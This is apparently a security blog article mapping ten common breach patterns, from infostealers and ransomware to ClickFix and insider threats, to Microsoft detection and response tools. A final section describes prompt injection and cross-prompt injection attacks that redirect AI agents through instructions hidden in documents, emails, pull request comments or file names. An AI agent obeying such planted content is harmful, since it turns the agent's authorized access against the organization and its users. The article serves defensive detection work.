The Top 10 Threats Breaching Organizations Right Now — and the Microsoft Stack to Detect Them
The 2025 DBIR and MDDR document 10 breach patterns hitting organizations hardest, plus one emerging AI agent attack vector SOCs need to start preparing for now. Here's the Microsoft detection stack mapped to each threat.
The Top 10 Threats Breaching Organizations Right Now — and the Microsoft Stack to Detect Them
The DBIR analyzed 22,052 incidents. MDDR tracked 30+ billion threat signals daily. If you want to know what's breaking organizations right now, the data is there.
The question is whether your detection stack maps to it.
I've been working through the Verizon 2025 DBIR and Microsoft Digital Defense Report 2025 to map ten breach patterns that show up most often against the Microsoft security product portfolio — plus one forward-looking threat that isn't in the DBIR data yet but needs to be in your planning now. Here's what the data says, and the tools built to catch it.
Threat 1: Infostealer-driven credential theft
The numbers: 22% of DBIR breaches start with stolen credentials. 51% of MDDR incidents reference infostealer activity.
This is the industrialized access market in action. Malware like Lumma Stealer, RedLine, and Vidar drops onto endpoints, usually through malvertising, cracked software, or social engineering. The malware harvests session tokens, plaintext credentials, and browser data. Within hours, that access appears in infostealer marketplaces or gets sold directly to access brokers.
The attack chain typically looks like this:
- Infostealer malware executes
- Session tokens or plaintext credentials harvested
- Federation abuse or pass-the-cookie attacks follow
- Attacker operates as a legitimate user
Here's the part that matters for detection: 30% of systems in infostealer data were estimated to be enterprise-licensed devices (DBIR), and 46% of corporate-login devices in that subset were non-managed. Your BYOD and contractor population is a credential harvesting target.
Detect with
Microsoft Defender for Endpoint (MDE) provides behavioral detection for credential access patterns, clipboard-to-shell behavior, unusual browser credential store access, loader activity that precedes payload delivery.
Entra ID Protection catches the downstream abuse through risky sign-in policies. When an infostealer-harvested token gets used from an unexpected location or device, risk scoring flags it.
Respond with
Token revocation via Conditional Access: force reauthentication when risk is detected. Build a Sentinel playbook for automated remediation: isolate the compromised identity, revoke sessions, trigger password reset, and alert the SOC.
Threat 2: Human-operated ransomware
The numbers: 44% of DBIR breaches involve ransomware. MDDR reports an 87% year-over-year increase in human-operated ransomware campaigns.
These aren't automated spray and pray attacks. Human-operated ransomware means hands-on-keyboard attackers with weeks of dwell time before encryption. They're moving laterally, hunting for backup systems, identifying domain controllers, and staging data exfiltration.
The kill chain is long. That's the good news — if you catch it early, the ransom never happens.
Average dwell time runs 12 days with average attack length of 58 days (MDDR). 79% of ransomware cases involve at least one remote monitoring and management (RMM) tool for persistence. 40% target hybrid environments, moving between on-premises and cloud.
Detect with
Defender for Endpoint monitors for ransomware behavior: tampering with security solutions, unusual RMM tool usage, encryption activity patterns.
Defender for Identity catches the lateral movement: DCSync attacks, Pass the Hash, Kerberoasting, suspicious replication requests against Active Directory.
The detection sweet spot is the reconnaissance and lateral movement phase, not the encryption phase. By the time ransomware starts encrypting, you're in response mode.
Respond with
Automated isolation via Defender XDR Live Response: contain the compromised endpoint before lateral movement expands.
Build Sentinel incident playbooks for coordinated response: correlate identity compromise with endpoint alerts, disable compromised accounts, and trigger your IR workflow.
Threat 3: Vulnerability exploitation (initial access)
The numbers: 20% of DBIR breaches involve vulnerability exploitation as the initial access vector. That's a 34% year-over-year growth rate.
Here's the part that should worry you: within those exploitation cases, 22% targeted edge devices and VPNs specifically. And the median time to full remediation for edge vulnerabilities is 32 days (DBIR).
That's a 32-day attack window on every critical CVE affecting your perimeter.
Exploitation is landing on edge devices, firewall management interfaces, VPNs, and file transfer systems, exactly the systems that are hardest to patch without taking services offline.
Detect with
Defender for Cloud provides exposure management across your Azure footprint: where are your publicly exposed assets, what vulnerabilities exist, what's the blast radius.
Defender Vulnerability Management prioritizes remediation based on actual threat intelligence. Not every critical CVE is being actively exploited. The ones that are need to jump the queue.
Respond with
Prioritized remediation workflows driven by threat exposure tracking. Just in time VM access for high-risk systems reduces the standing attack surface while you work through the patch backlog.
For zero-days and high-exploitation-probability CVEs, compensating controls matter: network segmentation, behavior-based detection for post-exploitation activity, and virtual patching where available.
Threat 4: Business email compromise (BEC)
The numbers: BEC accounts for 21% of DBIR attack outcomes. The FBI estimates annual losses exceed $6.3 billion.
Modern BEC has evolved beyond simple email impersonation. Attackers now use adversary-in-the-middle (AiTM) phishing to bypass MFA entirely by stealing session tokens post-authentication. The user successfully authenticates with their second factor, and the attacker captures the resulting token.
The median BEC loss sits around $50,000, with wire transfer remaining the preferred payout method in 88% of cases (DBIR).
Detect with
Defender for Office 365 with Safe Links and AiTM detection catches phishing campaigns designed to harvest session tokens.
Entra ID Protection flags phishing-resistant sign-in anomalies — did the authentication happen on an unexpected device, through an unusual flow, or from a location that doesn't match user behavior?
Respond with
The real answer here is prevention: phishing-resistant MFA policies using FIDO2 or passkeys. AiTM attacks don't work against hardware keys. There's no token to steal when authentication is cryptographically bound to the device.
Layer on Conditional Access device compliance requirements to ensure the authentication happens on a managed, healthy endpoint.
Threat 5: Cloud identity attacks (password spray and brute force)
The numbers: MDDR reports a 23% increase in cloud identity attacks. Password spray is often the first move in a cloud account takeover chain.
The spray pattern has evolved to low and slow distribution across IP addresses. DBIR and MDDR both note concentration through specific infrastructure — just 20 autonomous system numbers account for 80% of malicious password spray activity (MDDR).
Detect with
Entra ID Protection risk-based Conditional Access catches spray patterns through AI-driven analysis of authentication data.
Sentinel scheduled analytics rules detect spray patterns that risk scoring alone might miss — particularly low-and-slow activity distributed across accounts over time.
Build custom detection for authentication failures concentrated in specific ASNs or geolocations that match known spray infrastructure.
Respond with
MFA enforcement is the baseline. Smart lockout tuning prevents account lockout from legitimate users while blocking attacker attempts.
Named location policies let you block authentication entirely from locations where your organization doesn't operate. If you don't have employees in a given country, there's no reason to accept authentication attempts from there.
Threat 6: Data exfiltration
The numbers: Data exfiltration was present in 80% of MDDR ransomware IR engagements. 82% of ransomware incidents involved data exfiltration before encryption.
This is the shift to double and triple extortion. Attackers steal data first. Even if you have solid backups and don't pay the ransom, they still have that threat over you.
Most exfiltration uses legitimate cloud storage: OneDrive, SharePoint anomalies, external cloud uploads through the browser. Attackers use your own tools against you because that traffic blends with normal business operations.
Detect with
Microsoft Defender for Cloud Apps (MCAS) detects the behavioral anomalies that signal exfiltration: impossible travel, mass downloads, sensitive data movement to external locations, uploads to unsanctioned cloud storage.
Configure policies for file sharing anomalies, bulk download detection, and access to sensitive data repositories outside normal business hours.
Respond with
Microsoft Purview DLP policies enforce data protection at the point of exfiltration: block sensitive data from leaving through unauthorized channels.
MCAS session control via app conditional access lets you apply real-time policies: monitor and restrict file downloads in browser sessions, require step-up authentication for sensitive operations.
Threat 7: Third-party and access broker exploitation
The numbers: Third-party involvement in breaches doubled from 15% to 30% year-over-year (DBIR). MDDR tracks 368 active access brokers operating across 68 industries and 131 countries.
Access brokers have industrialized the initial compromise phase. They specialize in breaching environments and selling persistent access to ransomware operators, data extortion groups, and espionage actors. 80% of access methods sold involve credential-based attacks (MDDR), often bundled with reconnaissance data about the target environment.
The median time to remediate leaked secrets in GitHub repositories is 94 days (DBIR). That's 94 days where your API keys, service account credentials, or connection strings are available to anyone who finds them.
Detect with
Microsoft Entra External Identities with guest access review lets you track third-party access to your environment. Who has access, what can they reach, when did they last use it?
Privileged Identity Management (PIM) for vendor access enforces just in time elevation. Vendors don't maintain standing privileged access.
Build a Sentinel custom workbook for third-party sign-in anomalies: unusual access times, geographic anomalies, first-time access to sensitive resources.
Respond with
Automated guest access expiry: third-party accounts require periodic renewal, not indefinite persistence.
Quarterly access reviews via Entra keep external access validated and appropriately scoped.
Threat 8: ClickFix and AI-facilitated social engineering
ClickFix is a technique, not a tool. The attacker lures a user to a counterfeit CAPTCHA or browser error page and instructs them to paste a clipboard-injected command into a Run dialog or PowerShell prompt. There is no file download, no browser warning, no email attachment. The payload executes directly from the clipboard in the user's context.
This technique accounts for 47% of MDDR-tracked initial access incidents categorized under social engineering. Deepfake voice manipulation — where attackers clone an executive's voice for wire transfer approval calls or fabricated video meetings — falls under the same AI-facilitated category.
Detect with
PowerShell Script Block Logging (Event ID 4104) across all endpoints. Pair with Microsoft Defender for Office 365 Safe Links for URL inspection before a user reaches a lure page. Sentinel analytics rules targeting clipboard-paste execution patterns from unusual parent processes.
Threat 9: Software supply chain attacks
Modern attacks are targeting the development pipeline rather than the production environment. CI/CD system compromise, dependency poisoning, and artifact registry tampering are all active patterns documented in MDDR.
CDK Global's cascading impact on automotive dealership software. Change Healthcare's dependency compromise. A single build server or poisoned package registry can reach dozens of downstream organizations before the attack is detected. Median time to detect a supply chain compromise is significantly longer than a direct breach because the entry point is trusted infrastructure.
Detect with
GitHub Advanced Security with software composition analysis running in every pipeline. Defender for Cloud for CVE visibility on build infrastructure. Monitor artifact registries for unexpected package updates, version anomalies, or signature changes.
Threat 10: Insider threats and privileged user abuse
Internal actors appeared in 19% of DBIR breaches. The category covers malicious insiders, compromised privileged accounts, and users bypassing security controls for convenience. All three produce similar telemetry patterns: unusual data access volume, credential escalation outside business hours, unexpected export operations.
MDDR flags overprivileged accounts as a primary amplifier. Shared admin credentials and standing privileged access create unnecessary blast radius even when the actor behind the access has no malicious intent. The stolen credential is only as dangerous as the permissions it carries.
Detect with
Microsoft Purview Insider Risk Management with HR data integration — termination dates and manager-flagged performance triggers provide the highest-fidelity signals for identifying at-risk periods. Entra Privileged Identity Management for all privileged roles with no standing access. Alert on PIM activation patterns outside business hours or without a preceding incident or change ticket.
Bonus — AI agent infrastructure attacks: prepare now
The ten threats above are all documented in the 2025 DBIR and MDDR data cycle. This one is different.
T11 is not a SOC-specific threat. It is an organizational threat that SOC teams are responsible for detecting and responding to — across every agent deployment in the tenant, not just the agents the SOC operates directly.
Organizations are deploying AI agents faster than detection coverage is being built for them. M365 Copilot agents with access to SharePoint, Teams, and email. Business process agents approving invoices, processing HR data, placing procurement orders. Development agents with repository and CI/CD access. Multi-agent orchestration workflows where a compromised orchestrator can poison every downstream agent in the chain. Each of these creates an attack surface the SOC owns but didn't deploy.
Two documented attack patterns are already active across this broader surface. Prompt injection from external content, where adversarial instructions embedded in a document, email, SharePoint file, or pull request comment attempt to redirect agent behavior. And cross-prompt injection attacks (XPIA), where adversarial content embedded in objects the agent reads during its work — a username, a calendar event, an invoice description, a file name — overrides the agent's operational instructions and produces a manipulated output.
The attack doesn't need to defeat security controls. It just needs to reach the agent's context window through a trusted data source. A XPIA payload in a shared document redirects a Copilot agent with M365 delegated permissions. A poisoned pull request comment redirects a coding agent with repo write access. The agent's own authorized identity becomes the attack vector — no credential theft required.
The blast radius compounds in multi-agent workflows. When agents call other agents, a compromised orchestrator can poison downstream agent behavior across the entire chain. The exposure isn't one service principal. It's every agent the orchestrator reaches.
Detect with
Microsoft Purview unified audit logs include dedicated event types for AI agent activity: XPIADetected and JailbreakDetected, both generally available. These fire across all Microsoft AI agent surfaces — Copilot, custom agents, and third-party agents integrated via Microsoft AI safety stack. Log these. Alert on them. Treat any positive as a P2 investigation.
For every agent service principal in your tenant: run blast radius analysis in Microsoft Sentinel before deployment. Inventory all agent identities, apply Entra PIM just-in-time access, and remove any permission the agent doesn't need for its specific function. And never close a security incident based solely on an AI agent verdict — cross-reference agent output against source telemetry before acting on any conclusion.
Executive summary for security leadership
The three controls that address five of the ten documented breach patterns: Entra ID Protection P2 for credential protection, Defender for Endpoint P2 for endpoint behavioral detection, and Defender for Cloud Apps for cloud app visibility.
Those three cover infostealer abuse, ransomware lateral movement, BEC, cloud identity attacks, and data exfiltration. Vulnerability exploitation, third-party exposure, supply chain (T9), and insider threats (T10) need dedicated program investment beyond tooling.
The bonus AI agent coverage is live now.
XPIADetectedandJailbreakDetectedare generally available event types in the Purview unified audit log. The SOC's responsibility here is tenant-wide — not just agents the SOC operates, but every agent service principal deployed across M365 Copilot, business process automation, and development pipelines. Inventory all agent identities, run blast radius analysis on each, and haveXPIADetectedalerting before your first incident — not after.Most organizations with M365 E5 already own the licenses for all of this. The gap is configuration and integration, not procurement.
Licensing reality check
The tool recommendations in this article reflect current Microsoft licensing tiers, primarily Microsoft 365 E5 and the various Defender plans. Check your current licensing for exact feature availability; some capabilities require add-on licenses or specific SKUs.
Configuration details here are starting points. Every environment has different baselines, user behavior patterns, and risk tolerance. You'll need to tune thresholds and policies for your specific situation.
What's next
Knowing which tools to deploy is the first step.
Knowing which logs to actually turn on and forward to Sentinel — so those tools generate actionable detections — is what we cover next.
Next up: Article 2: The Log Sources Your SOC Needs for Detection, Forensics, and Hunting
Start with the Entra ID and Defender XDR connectors in Sentinel and work through the list in sequence. The gaps will become obvious once you see which queries return no data.
This article is part of the Threat-Informed Defense Series: The Agentic SOC. See the pillar article for the complete framework.